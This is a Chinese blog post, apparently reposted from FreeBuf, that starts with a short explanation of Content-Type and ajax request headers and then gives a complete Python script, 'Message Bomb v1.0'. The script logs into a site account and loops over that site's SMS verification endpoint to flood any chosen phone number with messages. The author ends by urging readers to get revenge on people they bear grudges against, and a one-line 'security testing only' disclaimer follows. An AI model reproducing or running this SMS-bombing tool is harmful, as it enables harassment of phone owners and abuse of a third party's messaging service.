python模拟ajax请求_短信炸弹—用Python模拟ajax请求

我们经常使用各种脚本发送网络请求，提交各种形式的body数据，所以Content-Type的类型也有很多种。

常见的取值有：

application/xml ： 在 XML RPC，如 RESTful/SOAP 调用时使用

application/json ： 在 JSON RPC 调用时使用

application/x-www-form-urlencoded ： 浏览器提交 Web 表单时使用

Content-Type : 在使用 REST 接口时，服务器会检查该值，用来确定 HTTP Body 中的内容该怎样解析。

在提交web表单数据时，Body中的数据格式要和Content-Type的值类型一致，如果Content-Type 设置错误会导致服务器拒绝服务

还有些网站的数据需要通过ajax来请求获得，ajax请求在发起请求之前必须设置必要的http头，还需要将请求数据封装为json格式。

下面的脚本代码就是这种情况，将请求数据封装为json格式：

req.add_header('Content-Type', 'application/json')

然后设置ajax请求形式的请求头：

req.add_header('X-Requested-With','XMLHttpRequest')

#-*-coding:utf-8-*-

#!/usr/bin/python

#

# Message Bomb v1.0

#From: By: xfkxfk

#

import json

import urllib2

import sys

def request_ajax_url(url,body,referer=None,cookie=None,**headers):

req = urllib2.Request(url)

req.add_header('Content-Type', 'application/json')

req.add_header('X-Requested-With','XMLHttpRequest')

if cookie:

req.add_header('Cookie',cookie)

if referer:

req.add_header('Referer',referer)

if headers:

for k in headers.keys():

req.add_header(k,headers[k])

postBody = json.dumps(body)

response = urllib2.urlopen(req, postBody)

if response:

return response

def run():

import time

"use username:xfkxfk; use password:123456"

login_url = '/member/Login.aspx'

login_body = {"action":"login","UserName":"xfkxfk","Password":"123456","AutomaticLogin":False}

login_referer = "/member/Login.aspx?ReturnUrl=aHR0cDovL3d3dy5sdXNlbi5jb20vRGVmYXVsdC5hc3B4"

url = '/Member/MobileValidate.aspx'

referer = "/Member/ModifyMobileValidate.aspx"

headers = {}

response = request_ajax_url(login_url,login_body,login_referer)

if response.read() == "1":

print " Login Success !!!"

if response.headers.has_key('set-cookie'):

set_cookie = response.headers['set-cookie']

else :

print " Get set-cookie Failed !!! May Send Messages Failed ~~~"

if len(sys.argv) < 3:

print "\nUsage: python " + sys.argv[0] + "mobile_number" + "count\n"

sys.exit()

mobile_number = sys.argv[1]

count = sys.argv[2]

body = {"action":"GetValidateCode","Mobile":mobile_number}

i=0

while i < int(count):

response = request_ajax_url(url,body,referer,set_cookie)

i=i+1

if response.read() == "发送成功":

print " Send " + count + " Messages To " + mobile_number + " !!!"

if __name__ == "__main__":

run()

大家有仇报仇有怨抱怨啊

(Freebuf温馨提示：仅供安全测试之用，禁止非法用途)